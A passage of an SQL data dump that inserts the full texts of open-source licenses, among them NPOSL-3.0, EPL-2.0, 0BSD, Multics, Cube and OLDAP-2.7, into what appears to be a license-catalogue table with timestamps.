PROGRAM AND ANY DERIVATIVE WORKS\"AS IS\" WITHOUT WARRANTY OF ANY KIND,\nEITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\nOF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS\nTO THE QUALITY AND PERFORMANCE OF THE PROGRAM AND ANY DERIVATIVE WORK IS WITH\nYOU. SHOULD THE PROGRAM OR ANY DERIVATIVE WORK PROVE DEFECTIVE, YOU ASSUME\nTHE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.\n\n5.2 IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW WILL 3DFX INTERACTIVE, INC.,\nOR ANY OTHER COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE\nTHE PROGRAM OR DERIVATIVE WORKS AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,\nINCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING\nOUT OF THE USE OR INABILITY TO USE THE PROGRAM OR DERIVATIVE WORKS (INCLUDING\nBUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES\nSUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM OR DERIVATIVE\nWORKS TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY\nHAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(223,'NPOSL-3.0','Non-Profit Open Software License 3.0\n\nThis Non-Profit Open Software License (\"Non-Profit OSL\") version 3.0 (the\n\"License\") applies to any original work of authorship (the \"Original Work\")\nwhose owner (the \"Licensor\") has placed the following licensing notice adjacent\nto the copyright notice for the Original Work:\n\nLicensed under the Non-Profit Open Software License version 3.0\n\n1) Grant of Copyright License. Licensor grants You a worldwide, royalty-free,\nnon-exclusive, sublicensable license, for the duration of the copyright, to\ndo the following:\n\na) to reproduce the Original Work in copies, either alone or as part of a\ncollective work;\n\nb) to translate, adapt, alter, transform, modify, or arrange the Original\nWork, thereby creating derivative works (\"Derivative Works\") based upon the\nOriginal Work;\n\nc) to distribute or communicate copies of the Original Work and Derivative\nWorks to the public, with the proviso that copies of Original Work or Derivative\nWorks that You distribute or communicate shall be licensed under this Non-Profit\nOpen Software License or as provided in section 17(d);\n\n d) to perform the Original Work publicly; and\n\n e) to display the Original Work publicly.\n\n2) Grant of Patent License. Licensor grants You a worldwide, royalty-free,\nnon-exclusive, sublicensable license, under patent claims owned or controlled\nby the Licensor that are embodied in the Original Work as furnished by the\nLicensor, for the duration of the patents, to make, use, sell, offer for sale,\nhave made, and import the Original Work and Derivative Works.\n\n3) Grant of Source Code License. The term \"Source Code\" means the preferred\nform of the Original Work for making modifications to it and all available\ndocumentation describing how to modify the Original Work. Licensor agrees\nto provide a machine-readable copy of the Source Code of the Original Work\nalong with each copy of the Original Work that Licensor distributes. Licensor\nreserves the right to satisfy this obligation by placing a machine-readable\ncopy of the Source Code in an information repository reasonably calculated\nto permit inexpensive and convenient access by You for as long as Licensor\ncontinues to distribute the Original Work.\n\n4) Exclusions From License Grant. Neither the names of Licensor, nor the names\nof any contributors to the Original Work, nor any of their trademarks or service\nmarks, may be used to endorse or promote products derived from this Original\nWork without express prior permission of the Licensor. Except as expressly\nstated herein, nothing in this License grants any license to Licensor\'s trademarks,\ncopyrights, patents, trade secrets or any other intellectual property. No\npatent license is granted to make, use, sell, offer for sale, have made, or\nimport embodiments of any patent claims other than the licensed claims defined\nin Section 2. No license is granted to the trademarks of Licensor even if\nsuch marks are included in the Original Work. Nothing in this License shall\nbe interpreted to prohibit Licensor from licensing under terms different from\nthis License any Original Work that Licensor otherwise would have a right\nto license.\n\n5) External Deployment. The term \"External Deployment\" means the use, distribution,\nor communication of the Original Work or Derivative Works in any way such\nthat the Original Work or Derivative Works may be used by anyone other than\nYou, whether those works are distributed or communicated to those persons\nor made available as an application intended for use over a network. As an\nexpress condition for the grants of license hereunder, You must treat any\nExternal Deployment by You of the Original Work or a Derivative Work as a\ndistribution under section 1(c).\n\n6) Attribution Rights. You must retain, in the Source Code of any Derivative\nWorks that You create, all copyright, patent, or trademark notices from the\nSource Code of the Original Work, as well as any notices of licensing and\nany descriptive text identified therein as an \"Attribution Notice.\" You must\ncause the Source Code for any Derivative Works that You create to carry a\nprominent Attribution Notice reasonably calculated to inform recipients that\nYou have modified the Original Work.\n\n7) Warranty of Provenance and Disclaimer of Warranty. The Original Work is\nprovided under this License on an \"AS IS\" BASIS and WITHOUT WARRANTY, either\nexpress or implied, including, without limitation, the warranties of non-infringement,\nmerchantability or fitness for a particular purpose. THE ENTIRE RISK AS TO\nTHE QUALITY OF THE ORIGINAL WORK IS WITH YOU. This DISCLAIMER OF WARRANTY\nconstitutes an essential part of this License. No license to the Original\nWork is granted by this License except under this disclaimer.\n\n8) Limitation of Liability. Under no circumstances and under no legal theory,\nwhether in tort (including negligence), contract, or otherwise, shall the\nLicensor be liable to anyone for any direct, indirect, special, incidental,\nor consequential damages of any character arising as a result of this License\nor the use of the Original Work including, without limitation, damages for\nloss of goodwill, work stoppage, computer failure or malfunction, or any and\nall other commercial damages or losses. This limitation of liability shall\nnot apply to the extent applicable law prohibits such limitation.\n\n9) Acceptance and Termination. If, at any time, You expressly assented to\nthis License, that assent indicates your clear and irrevocable acceptance\nof this License and all of its terms and conditions. If You distribute or\ncommunicate copies of the Original Work or a Derivative Work, You must make\na reasonable effort under the circumstances to obtain the express assent of\nrecipients to the terms of this License. This License conditions your rights\nto undertake the activities listed in Section 1, including your right to create\nDerivative Works based upon the Original Work, and doing so without honoring\nthese terms and conditions is prohibited by copyright law and international\ntreaty. Nothing in this License is intended to affect copyright exceptions\nand limitations (including \"fair use\" or \"fair dealing\"). This License shall\nterminate immediately and You may no longer exercise any of the rights granted\nto You by this License upon your failure to honor the conditions in Section\n1(c).\n\n10) Termination for Patent Action. This License shall terminate automatically\nand You may no longer exercise any of the rights granted to You by this License\nas of the date You commence an action, including a cross-claim or counterclaim,\nagainst Licensor or any licensee alleging that the Original Work infringes\na patent. This termination provision shall not apply for an action alleging\npatent infringement by combinations of the Original Work with other software\nor hardware.\n\n11) Jurisdiction, Venue and Governing Law. Any action or suit relating to\nthis License may be brought only in the courts of a jurisdiction wherein the\nLicensor resides or in which Licensor conducts its primary business, and under\nthe laws of that jurisdiction excluding its conflict-of-law provisions. The\napplication of the United Nations Convention on Contracts for the International\nSale of Goods is expressly excluded. Any use of the Original Work outside\nthe scope of this License or after its termination shall be subject to the\nrequirements and penalties of copyright or patent law in the appropriate jurisdiction.\nThis section shall survive the termination of this License.\n\n12) Attorneys\' Fees. In any action to enforce the terms of this License or\nseeking damages relating thereto, the prevailing party shall be entitled to\nrecover its costs and expenses, including, without limitation, reasonable\nattorneys\' fees and costs incurred in connection with such action, including\nany appeal of such action. This section shall survive the termination of this\nLicense.\n\n13) Miscellaneous. If any provision of this License is held to be unenforceable,\nsuch provision shall be reformed only to the extent necessary to make it enforceable.\n\n14) Definition of \"You\" in This License. \"You\" throughout this License, whether\nin upper or lower case, means an individual or a legal entity exercising rights\nunder, and complying with all of the terms of, this License. For legal entities,\n\"You\" includes any entity that controls, is controlled by, or is under common\ncontrol with you. For purposes of this definition, \"control\" means (i) the\npower, direct or indirect, to cause the direction or management of such entity,\nwhether by contract or otherwise, or (ii) ownership of fifty percent (50%)\nor more of the outstanding shares, or (iii) beneficial ownership of such entity.\n\n15) Right to Use. You may use the Original Work in all ways not otherwise\nrestricted or conditioned by this License or by law, and Licensor promises\nnot to interfere with or be responsible for such uses by You.\n\n16) Modification of This License. This License is Copyright © 2005 Lawrence\nRosen. Permission is granted to copy, distribute, or communicate this License\nwithout modification. Nothing in this License permits You to modify this License\nas applied to the Original Work or to Derivative Works. However, You may modify\nthe text of this License and copy, distribute or communicate your modified\nversion (the \"Modified License\") and apply it to other original works of authorship\nsubject to the following conditions: (i) You may not indicate in any way that\nyour Modified License is the \"Open Software License\" or \"OSL\" and you may\nnot use those names in the name of your Modified License; (ii) You must replace\nthe notice specified in the first paragraph above with the notice \"Licensed\nunder <insert your license name here>\" or with a notice of your own that is\nnot confusingly similar to the notice in this License; and (iii) You may not\nclaim that your original works are open source software unless your Modified\nLicense has been approved by Open Source Initiative (OSI) and You comply with\nits license review and certification process.\n\n17) Non-Profit Amendment. The name of this amended version of the Open Software\nLicense (\"OSL 3.0\") is \"Non-Profit Open Software License 3.0\". The original\nOSL 3.0 license has been amended as follows:\n\n(a) Licensor represents and declares that it is a not-for-profit organization\nthat derives no revenue whatsoever from the distribution of the Original Work\nor Derivative Works thereof, or from support or services relating thereto.\n\n(b) The first sentence of Section 7 [\"Warranty of Provenance\"] of OSL 3.0\nhas been stricken. For Original Works licensed under this Non-Profit OSL 3.0,\nLICENSOR OFFERS NO WARRANTIES WHATSOEVER.\n\n(c) In the first sentence of Section 8 [\"Limitation of Liability\"] of this\nNon-Profit OSL 3.0, the list of damages for which LIABILITY IS LIMITED now\nincludes \"direct\" damages.\n\n(d) The proviso in Section 1(c) of this License now refers to this \"Non-Profit\nOpen Software License\" rather than the \"Open Software License\". You may distribute\nor communicate the Original Work or Derivative Works thereof under this Non-Profit\nOSL 3.0 license only if You make the representation and declaration in paragraph\n(a) of this Section 17. Otherwise, You shall distribute or communicate the\nOriginal Work or Derivative Works thereof only under the OSL 3.0 license and\nYou shall publish clear licensing notices so stating. Also by way of clarification,\nthis License does not authorize You to distribute or communicate works under\nthis Non-Profit OSL 3.0 if You received them under the original OSL 3.0 license.\n\n(e) Original Works licensed under this license shall reference \"Non-Profit\nOSL 3.0\" in licensing notices to distinguish them from works licensed under\nthe original OSL 3.0 license.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(224,'Zed','(c) Jim Davies, January 1995\n\nYou may copy and distribute this file freely. Any queries and complaints should\nbe forwarded to Jim.Davies@comlab.ox.ac.uk.\n\nIf you make any changes to this file, please do not distribute the results\nunder the name `zed-csp.sty\'.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(225,'RSA-MD','Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All rights reserved.\n\nLicense to copy and use this software is granted provided that it is identified\nas the \"RSA Data Security, Inc. MD5 Message-Digest Algorithm\" in all material\nmentioning or referencing this software or this function.\n\nLicense is also granted to make and use derivative works provided that such\nworks are identified as \"derived from the RSA Data Security, Inc. MD5 Message-Digest\nAlgorithm\" in all material mentioning or referencing the derived work.\n\nRSA Data Security, Inc. makes no representations concerning either the merchantability\nof this software or the suitability of this software for any particular purpose.\nIt is provided \"as is\" without express or implied warranty of any kind.\n\nThese notices must be retained in any copies of any part of this documentation\nand/or software.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(226,'VSL-1.0','Vovida Software License v. 1.0 This license applies to all software incorporated\nin the \"Vovida Open Communication Application Library\" except for those portions\nincorporating third party software specifically identified as being licensed\nunder separate license. The Vovida Software License, Version 1.0\n\nCopyright (c) 2000 Vovida Networks, Inc. All rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. The names \"VOCAL\", \"Vovida Open Communication Application Library\", and\n\"Vovida Open Communication Application Library (VOCAL)\" must not be used to\nendorse or promote products derived from this software without prior written\npermission. For written permission, please contact vocal@vovida.org.\n\n4. Products derived from this software may not be called \"VOCAL\", nor may\n\"VOCAL\" appear in their name, without prior written permission.\n\nTHIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY EXPRESSED OR IMPLIED WARRANTIES,\nINCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE, TITLE AND NON-INFRINGEMENT ARE DISCLAIMED.\nIN NO EVENT SHALL VOVIDA NETWORKS, INC. OR ITS CONTRIBUTORS BE LIABLE FOR\nANY DAMAGES IN EXCESS OF $1,000, NOR FOR ANY INDIRECT, INCIDENTAL, SPECIAL,\nEXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\nOF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\nINTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\nSTRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY\nWAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF\nSUCH DAMAGE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(227,'EPL-2.0','Eclipse Public License - v 2.0\n\nTHE ACCOMPANYING PROGRAM IS PROVIDED UNDER THE TERMS OF THIS ECLIPSE PUBLIC\nLICENSE (\"AGREEMENT\"). ANY USE, REPRODUCTION OR DISTRIBUTION OF THE PROGRAM\nCONSTITUTES RECIPIENT\'S ACCEPTANCE OF THIS AGREEMENT.\n\n 1. DEFINITIONS\n\n \"Contribution\" means:\n\na) in the case of the initial Contributor, the initial content Distributed\nunder this Agreement, and\n\n b) in the case of each subsequent Contributor:\n\n i) changes to the Program, and\n\n ii) additions to the Program;\n\nwhere such changes and/or additions to the Program originate from and are\nDistributed by that particular Contributor. A Contribution \"originates\" from\na Contributor if it was added to the Program by such Contributor itself or\nanyone acting on such Contributor\'s behalf. Contributions do not include changes\nor additions to the Program that are not Modified Works.\n\n \"Contributor\" means any person or entity that Distributes the Program.\n\n\"Licensed Patents\" mean patent claims licensable by a Contributor which are\nnecessarily infringed by the use or sale of its Contribution alone or when\ncombined with the Program.\n\n\"Program\" means the Contributions Distributed in accordance with this Agreement.\n\n\"Recipient\" means anyone who receives the Program under this Agreement or\nany Secondary License (as applicable), including Contributors.\n\n\"Derivative Works\" shall mean any work, whether in Source Code or other form,\nthat is based on (or derived from) the Program and for which the editorial\nrevisions, annotations, elaborations, or other modifications represent, as\na whole, an original work of authorship.\n\n\"Modified Works\" shall mean any work in Source Code or other form that results\nfrom an addition to, deletion from, or modification of the contents of the\nProgram, including, for purposes of clarity any new file in Source Code form\nthat contains any contents of the Program. Modified Works shall not include\nworks that contain only declarations, interfaces, types, classes, structures,\nor files of the Program solely in each case in order to link to, bind by name,\nor subclass the Program or Modified Works thereof.\n\n\"Distribute\" means the acts of a) distributing or b) making available in any\nmanner that enables the transfer of a copy.\n\n\"Source Code\" means the form of a Program preferred for making modifications,\nincluding but not limited to software source code, documentation source, and\nconfiguration files.\n\n\"Secondary License\" means either the GNU General Public License, Version 2.0,\nor any later versions of that license, including any exceptions or additional\npermissions as identified by the initial Contributor.\n\n 2. GRANT OF RIGHTS\n\na) Subject to the terms of this Agreement, each Contributor hereby grants\nRecipient a non-exclusive, worldwide, royalty-free copyright license to reproduce,\nprepare Derivative Works of, publicly display, publicly perform, Distribute\nand sublicense the Contribution of such Contributor, if any, and such Derivative\nWorks.\n\nb) Subject to the terms of this Agreement, each Contributor hereby grants\nRecipient a non-exclusive, worldwide, royalty-free patent license under Licensed\nPatents to make, use, sell, offer to sell, import and otherwise transfer the\nContribution of such Contributor, if any, in Source Code or other form. This\npatent license shall apply to the combination of the Contribution and the\nProgram if, at the time the Contribution is added by the Contributor, such\naddition of the Contribution causes such combination to be covered by the\nLicensed Patents. The patent license shall not apply to any other combinations\nwhich include the Contribution. No hardware per se is licensed hereunder.\n\nc) Recipient understands that although each Contributor grants the licenses\nto its Contributions set forth herein, no assurances are provided by any Contributor\nthat the Program does not infringe the patent or other intellectual property\nrights of any other entity. Each Contributor disclaims any liability to Recipient\nfor claims brought by any other entity based on infringement of intellectual\nproperty rights or otherwise. As a condition to exercising the rights and\nlicenses granted hereunder, each Recipient hereby assumes sole responsibility\nto secure any other intellectual property rights needed, if any. For example,\nif a third party patent license is required to allow Recipient to Distribute\nthe Program, it is Recipient\'s responsibility to acquire that license before\ndistributing the Program.\n\nd) Each Contributor represents that to its knowledge it has sufficient copyright\nrights in its Contribution, if any, to grant the copyright license set forth\nin this Agreement.\n\ne) Notwithstanding the terms of any Secondary License, no Contributor makes\nadditional grants to any Recipient (other than those set forth in this Agreement)\nas a result of such Recipient\'s receipt of the Program under the terms of\na Secondary License (if permitted under the terms of Section 3).\n\n 3. REQUIREMENTS\n\n 3.1 If a Contributor Distributes the Program in any form, then:\n\na) the Program must also be made available as Source Code, in accordance with\nsection 3.2, and the Contributor must accompany the Program with a statement\nthat the Source Code for the Program is available under this Agreement, and\ninforms Recipients how to obtain it in a reasonable manner on or through a\nmedium customarily used for software exchange; and\n\nb) the Contributor may Distribute the Program under a license different than\nthis Agreement, provided that such license:\n\ni) effectively disclaims on behalf of all other Contributors all warranties\nand conditions, express and implied, including warranties or conditions of\ntitle and non-infringement, and implied warranties or conditions of merchantability\nand fitness for a particular purpose;\n\nii) effectively excludes on behalf of all other Contributors all liability\nfor damages, including direct, indirect, special, incidental and consequential\ndamages, such as lost profits;\n\niii) does not attempt to limit or alter the recipients\' rights in the Source\nCode under section 3.2; and\n\niv) requires any subsequent distribution of the Program by any party to be\nunder a license that satisfies the requirements of this section 3.\n\n 3.2 When the Program is Distributed as Source Code:\n\na) it must be made available under this Agreement, or if the Program (i) is\ncombined with other material in a separate file or files made available under\na Secondary License, and (ii) the initial Contributor attached to the Source\nCode the notice described in Exhibit A of this Agreement, then the Program\nmay be made available under the terms of such Secondary Licenses, and\n\nb) a copy of this Agreement must be included with each copy of the Program.\n\n3.3 Contributors may not remove or alter any copyright, patent, trademark,\nattribution notices, disclaimers of warranty, or limitations of liability\n(\"notices\") contained within the Program from any copy of the Program which\nthey Distribute, provided that Contributors may add their own appropriate\nnotices.\n\n 4. COMMERCIAL DISTRIBUTION\n\nCommercial distributors of software may accept certain responsibilities with\nrespect to end users, business partners and the like. While this license is\nintended to facilitate the commercial use of the Program, the Contributor\nwho includes the Program in a commercial product offering should do so in\na manner which does not create potential liability for other Contributors.\nTherefore, if a Contributor includes the Program in a commercial product offering,\nsuch Contributor (\"Commercial Contributor\") hereby agrees to defend and indemnify\nevery other Contributor (\"Indemnified Contributor\") against any losses, damages\nand costs (collectively \"Losses\") arising from claims, lawsuits and other\nlegal actions brought by a third party against the Indemnified Contributor\nto the extent caused by the acts or omissions of such Commercial Contributor\nin connection with its distribution of the Program in a commercial product\noffering. The obligations in this section do not apply to any claims or Losses\nrelating to any actual or alleged intellectual property infringement. In order\nto qualify, an Indemnified Contributor must: a) promptly notify the Commercial\nContributor in writing of such claim, and b) allow the Commercial Contributor\nto control, and cooperate with the Commercial Contributor in, the defense\nand any related settlement negotiations. The Indemnified Contributor may participate\nin any such claim at its own expense.\n\nFor example, a Contributor might include the Program in a commercial product\noffering, Product X. That Contributor is then a Commercial Contributor. If\nthat Commercial Contributor then makes performance claims, or offers warranties\nrelated to Product X, those performance claims and warranties are such Commercial\nContributor\'s responsibility alone. Under this section, the Commercial Contributor\nwould have to defend claims against the other Contributors related to those\nperformance claims and warranties, and if a court requires any other Contributor\nto pay any damages as a result, the Commercial Contributor must pay those\ndamages.\n\n 5. NO WARRANTY\n\nEXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, AND TO THE EXTENT PERMITTED\nBY APPLICABLE LAW, THE PROGRAM IS PROVIDED ON AN \"AS IS\" BASIS, WITHOUT WARRANTIES\nOR CONDITIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED INCLUDING, WITHOUT LIMITATION,\nANY WARRANTIES OR CONDITIONS OF TITLE, NON-INFRINGEMENT, MERCHANTABILITY OR\nFITNESS FOR A PARTICULAR PURPOSE. Each Recipient is solely responsible for\ndetermining the appropriateness of using and distributing the Program and\nassumes all risks associated with its exercise of rights under this Agreement,\nincluding but not limited to the risks and costs of program errors, compliance\nwith applicable laws, damage to or loss of data, programs or equipment, and\nunavailability or interruption of operations.\n\n 6. DISCLAIMER OF LIABILITY\n\nEXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, AND TO THE EXTENT PERMITTED\nBY APPLICABLE LAW, NEITHER RECIPIENT NOR ANY CONTRIBUTORS SHALL HAVE ANY LIABILITY\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING WITHOUT LIMITATION LOST PROFITS), HOWEVER CAUSED AND ON\nANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\nNEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OR DISTRIBUTION\nOF THE PROGRAM OR THE EXERCISE OF ANY RIGHTS GRANTED HEREUNDER, EVEN IF ADVISED\nOF THE POSSIBILITY OF SUCH DAMAGES.\n\n 7. GENERAL\n\nIf any provision of this Agreement is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this Agreement, and without further action by the parties hereto,\nsuch provision shall be reformed to the minimum extent necessary to make such\nprovision valid and enforceable.\n\nIf Recipient institutes patent litigation against any entity (including a\ncross-claim or counterclaim in a lawsuit) alleging that the Program itself\n(excluding combinations of the Program with other software or hardware) infringes\nsuch Recipient\'s patent(s), then such Recipient\'s rights granted under Section\n2(b) shall terminate as of the date such litigation is filed.\n\nAll Recipient\'s rights under this Agreement shall terminate if it fails to\ncomply with any of the material terms or conditions of this Agreement and\ndoes not cure such failure in a reasonable period of time after becoming aware\nof such noncompliance. If all Recipient\'s rights under this Agreement terminate,\nRecipient agrees to cease use and distribution of the Program as soon as reasonably\npracticable. However, Recipient\'s obligations under this Agreement and any\nlicenses granted by Recipient relating to the Program shall continue and survive.\n\nEveryone is permitted to copy and distribute copies of this Agreement, but\nin order to avoid inconsistency the Agreement is copyrighted and may only\nbe modified in the following manner. The Agreement Steward reserves the right\nto publish new versions (including revisions) of this Agreement from time\nto time. No one other than the Agreement Steward has the right to modify this\nAgreement. The Eclipse Foundation is the initial Agreement Steward. The Eclipse\nFoundation may assign the responsibility to serve as the Agreement Steward\nto a suitable separate entity. Each new version of the Agreement will be given\na distinguishing version number. The Program (including Contributions) may\nalways be Distributed subject to the version of the Agreement under which\nit was received. In addition, after a new version of the Agreement is published,\nContributor may elect to Distribute the Program (including its Contributions)\nunder the new version.\n\nExcept as expressly stated in Sections 2(a) and 2(b) above, Recipient receives\nno rights or licenses to the intellectual property of any Contributor under\nthis Agreement, whether expressly, by implication, estoppel or otherwise.\nAll rights in the Program not expressly granted under this Agreement are reserved.\nNothing in this Agreement is intended to be enforceable by any entity that\nis not a Contributor or Recipient. No third-party beneficiary rights are created\nunder this Agreement.\n\n Exhibit A - Form of Secondary Licenses Notice\n\n\"This Source Code may also be made available under the following Secondary\nLicenses when the conditions for such availability set forth in the Eclipse\nPublic License, v. 2.0 are satisfied: {name license(s), version(s), and exceptions\nor additional permissions here}.\"\n\nSimply including a copy of this Agreement, including this Exhibit A is not\nsufficient to license the Source Code under Secondary Licenses.\n\nIf it is not possible or desirable to put the notice in a particular file,\nthen You may include the notice in a location (such as a LICENSE file in a\nrelevant directory) where a recipient would be likely to look for such a notice.\n\n You may add additional accurate notices of copyright ownership.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(228,'0BSD','Copyright (C) 2006 by Rob Landley <rob@landley.net>\n\nPermission to use, copy, modify, and/or distribute this software for any purpose\nwith or without fee is hereby granted.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH\nREGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY\nAND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,\nINDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM\nLOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE\nOR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR\nPERFORMANCE OF THIS SOFTWARE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(229,'Multics','Multics License Historical Background\n\nThis edition of the Multics software materials and documentation is provided\nand donated to Massachusetts Institute of Technology by Group BULL including\nBULL HN Information Systems Inc. as a contribution to computer science knowledge.\nThis donation is made also to give evidence of the common contributions of\nMassachusetts Institute of Technology, Bell Laboratories, General Electric,\nHoneywell Information Systems Inc., Honeywell BULL Inc., Groupe BULL and BULL\nHN Information Systems Inc. to the development of this operating system. Multics\ndevelopment was initiated by Massachusetts Institute of Technology Project\nMAC (1963-1970), renamed the MIT Laboratory for Computer Science and Artificial\nIntelligence in the mid 1970s, under the leadership of Professor Fernando\nJose Corbato. Users consider that Multics provided the best software architecture\nfor managing computer hardware properly and for executing programs. Many subsequent\noperating systems incorporated Multics principles. Multics was distributed\nin 1975 to 2000 by Group Bull in Europe, and in the U.S. by Bull HN Information\nSystems Inc., as successor in interest by change in name only to Honeywell\nBull Inc. and Honeywell Information Systems Inc. . -----------------------------------------------------------\n\nPermission to use, copy, modify, and distribute these programs and their documentation\nfor any purpose and without fee is hereby granted, provided that the below\ncopyright notice and historical background appear in all copies and that both\nthe copyright notice and historical background and this permission notice\nappear in supporting documentation, and that the names of MIT, HIS, BULL or\nBULL HN not be used in advertising or publicity pertaining to distribution\nof the programs without specific prior written permission.\n\nCopyright 1972 by Massachusetts Institute of Technology and Honeywell Information\nSystems Inc.\n\nCopyright 2006 by BULL HN Information Systems Inc.\n\nCopyright 2006 by Bull SAS All Rights Reserved\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(230,'Cube','Cube game engine source code, 20 dec 2003 release.\n\nCopyright (C) 2001-2003 Wouter van Oortmerssen.\n\nThis software is provided \'as-is\', without any express or implied warranty.\nIn no event will the authors be held liable for any damages arising from the\nuse of this software.\n\nPermission is granted to anyone to use this software for any purpose, including\ncommercial applications, and to alter it and redistribute it freely, subject\nto the following restrictions:\n\n1. The origin of this software must not be misrepresented; you must not claim\nthat you wrote the original software. If you use this software in a product,\nan acknowledgment in the product documentation would be appreciated but is\nnot required.\n\n2. Altered source versions must be plainly marked as such, and must not be\nmisrepresented as being the original software.\n\n 3. This notice may not be removed or altered from any source distribution.\n\nadditional clause specific to Cube:\n\n4. Source versions may not be \"relicensed\" under a different license without\nmy explicitly written permission.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(231,'OLDAP-2.7','The OpenLDAP Public License\n\nVersion 2.7, 7 September 2001\n\nRedistribution and use of this software and associated documentation (\"Software\"),\nwith or without modification, are permitted provided that the following conditions\nare met:\n\n1. Redistributions of source code must retain copyright statements and notices,\n\n2. Redistributions in binary form must reproduce applicable copyright statements\nand notices, this list of conditions, and the following disclaimer in the\ndocumentation and/or other materials provided with the distribution, and\n\n 3. Redistributions must contain a verbatim copy of this document.\n\nThe OpenLDAP Foundation may revise this license from time to time. Each revision\nis distinguished by a version number. You may use this Software under terms\nof this license revision or under the terms of any subsequent revision of\nthe license.\n\nTHIS SOFTWARE IS PROVIDED BY THE OPENLDAP FOUNDATION AND ITS CONTRIBUTORS\n``AS IS\'\' AND ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED\nTO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\nPURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OPENLDAP FOUNDATION, ITS CONTRIBUTORS,\nOR THE AUTHOR(S) OR OWNER(S) OF THE SOFTWARE BE LIABLE FOR ANY DIRECT, INDIRECT,\nINCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\nLIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,\nOR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\nLIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\nOR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF\nADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nThe names of the authors and copyright holders must not be used in advertising\nor otherwise to promote the sale, use or other dealing in this Software without\nspecific, written prior permission. Title to copyright in this Software shall\nat all times remain with copyright holders.\n\nOpenLDAP is a registered trademark of the OpenLDAP Foundation.\n\nCopyright 1999-2001 The OpenLDAP Foundation, Redwood City, California, USA.\nAll Rights Reserved. Permission to copy and distribute verbatim copies of\nthis document is granted.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(232,'DigiRule-FOSS-exception','DigiRule Solutions\'s FOSS License Exception Terms and Conditions\n\n 1. Definitions.\n\n \"Derivative Work\" means a derivative work, as defined under applicable copyright law, formed entirely from the Program and one or more FOSS Applications.\n\n \"FOSS Application\" means a free and open source software application distributed subject to a license listed in the section below titled \"FOSS License List.\"\n\n \"FOSS Notice\" means a notice placed by DigiRule Solutions in a copy of the Client Libraries stating that such copy of the Client Libraries may be distributed under DigiRule Solutions\'s or FOSS License Exception.\n\n \"Independent Work\" means portions of the Derivative Work that are not derived from the Program and can reasonably be considered independent and separate works.\n\n \"Program\" means a copy of DigiRule Solutions\'s Client Libraries that contain a FOSS 